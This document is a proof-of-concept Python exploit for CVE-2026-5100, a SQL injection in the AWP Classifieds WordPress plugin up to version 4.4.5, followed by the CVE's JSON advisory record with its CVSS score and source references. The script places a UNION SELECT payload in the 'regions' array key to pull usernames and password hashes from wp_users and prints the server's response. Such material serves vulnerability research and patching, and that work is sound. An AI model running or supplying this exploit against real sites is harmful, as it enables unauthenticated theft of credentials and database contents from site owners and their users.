CVE-2026-5100

# Proof of Concept for CVE-2026-5100 # Target: WordPress AWP Classifieds Plugin <= 4.4.5 import requests def exploit_sqli(target_url): # The vulnerability exists in the 'regions' parameter array keys # Attackers can inject SQL via the keys of the array payload = { "regions": { # Injecting SQL payload into the array key "0' UNION SELECT NULL, user_login, user_pass FROM wp_users-- ": "1" } } try: response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check the response for leaked database data.") print(response.text[:500]) # Print snippet of response else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": url = "http://example.com/wordpress/page-search-ads/" # Replace with actual target exploit_sqli(url)

{"cve": {"id": "CVE-2026-5100", "sourceIdentifier": "[email protected]", "published": "2026-05-05T03:15:59.730", "lastModified": "2026-05-05T19:09:32.000", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AWP Classifieds plugin for WordPress is vulnerable to SQL Injection via the 'regions' parameter array keys in versions up to, and including, 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L168", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L174", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L63", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L70", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1240", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1258", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1269", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1276", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/class-awpcp.php#L339", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/class-awpcp.php#L342", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L795", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L804", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L881", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L887", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L890", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L895", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L902", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L903", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7908d167-f831-4ed0-b754-2b390b5c3b2c?source=cve", "source": "[email protected]"}]}}